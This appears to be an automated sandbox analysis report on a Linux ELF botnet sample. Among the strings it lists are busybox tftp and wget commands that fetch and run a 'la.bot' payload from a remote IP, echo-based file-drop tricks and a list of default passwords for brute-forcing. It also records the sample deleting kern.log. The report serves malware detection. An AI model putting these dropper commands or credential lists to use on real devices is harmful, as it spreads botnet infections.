Click to jump to signature section
Source: na.elf | ReversingLabs: Detection: 28% |
Source: na.elf | String: ash|login|wget|curl|tftp|ntpdate |
Source: na.elf | String: N^Nu/proc/|ash|login|wget|curl|tftp|ntpdate/fdsocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//proc/net/tcp/bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet/bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t\x%02xsh |
Source: /tmp/na.elf (PID: 5447) | Socket: 127.0.0.1:1234 | Jump to behavior |
Source: na.elf | String found in binary or memory: http://%d.%d.%d.%d/la.bot.%s |
Source: Initial sample | String containing 'busybox' found: /bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet |
Source: Initial sample | String containing 'busybox' found: /bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t |
Source: Initial sample | String containing 'busybox' found: /bin/busybox BOT |
Source: Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1 |
Source: Initial sample | String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t |
Source: Initial sample | String containing 'busybox' found: /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox BOT |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45' |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c' |
Source: Initial sample | String containing 'busybox' found: N^Nu/proc/|ash|login|wget|curl|tftp|ntpdate/fdsocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//proc/net/tcp/bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet/bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t\x%02xsh |
Source: Initial sample | String containing 'busybox' found: /bin/busybox BOTbuf = %s |
Source: Initial sample | String containing 'busybox' found: >%st && cd %s && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t |
Source: Initial sample | String containing 'busybox' found: armx86_64mipsmipselsuperhpowerpcsparcget: applet not foundftp: applet not foundcho: applet not found>>retrieve/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45' |
Source: Initial sample | String containing potential weak password found: service |
Source: Initial sample | String containing potential weak password found: guest |
Source: Initial sample | String containing potential weak password found: admin |
Source: Initial sample | String containing potential weak password found: 123456 |
Source: Initial sample | String containing potential weak password found: default |
Source: Initial sample | String containing potential weak password found: 54321 |
Source: Initial sample | String containing potential weak password found: 12345678 |
Source: Initial sample | String containing potential weak password found: 654321 |
Source: Initial sample | String containing potential weak password found: support |
Source: Initial sample | String containing potential weak password found: password |
Source: Initial sample | String containing potential weak password found: supervisor |
Source: Initial sample | String containing potential weak password found: administrator |
Source: ELF static info symbol of initial sample | .symtab present: no |
Source: classification engine | Classification label: mal64.troj.evad.linELF@0/0@0/0 |
Source: /tmp/na.elf (PID: 5451) | File: /etc/config | Jump to behavior |
Source: /tmp/na.elf (PID: 5451) | Directory: /root/.cache | Jump to behavior |
Source: /tmp/na.elf (PID: 5451) | Directory: /root/.ssh | Jump to behavior |
Source: /tmp/na.elf (PID: 5451) | Directory: /root/.config | Jump to behavior |
Source: /tmp/na.elf (PID: 5451) | Directory: /root/.local | Jump to behavior |
Source: /tmp/na.elf (PID: 5451) | Directory: /tmp/.X11-unix | Jump to behavior |
Source: /tmp/na.elf (PID: 5451) | Directory: /tmp/.Test-unix | Jump to behavior |
Source: /tmp/na.elf (PID: 5451) | Directory: /tmp/.font-unix | Jump to behavior |
Source: /tmp/na.elf (PID: 5451) | Directory: /tmp/.ICE-unix | Jump to behavior |
Source: /tmp/na.elf (PID: 5451) | Directory: /tmp/.XIM-unix | Jump to behavior |
Source: /tmp/na.elf (PID: 5451) | Directory: /etc/.java | Jump to behavior |
Source: /tmp/na.elf (PID: 5451) | Log files deleted: /var/log/kern.log | Jump to behavior |
Source: /tmp/na.elf (PID: 5447) | Queries kernel information via 'uname': | Jump to behavior |
Source: na.elf, 5447.1.00007ffc31998000.00007ffc319b9000.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf |
Source: na.elf, 5447.1.00007ffc31998000.00007ffc319b9000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-m68k |
Source: na.elf, 5447.1.0000561c1427c000.0000561c14301000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/m68k |
Source: na.elf, 5447.1.0000561c1427c000.0000561c14301000.rw-.sdmp | Binary or memory string: V!/etc/qemu-binfmt/m68k |
Source: Yara match | File source: na.elf, type: SAMPLE |
Source: Yara match | File source: na.elf, type: SAMPLE |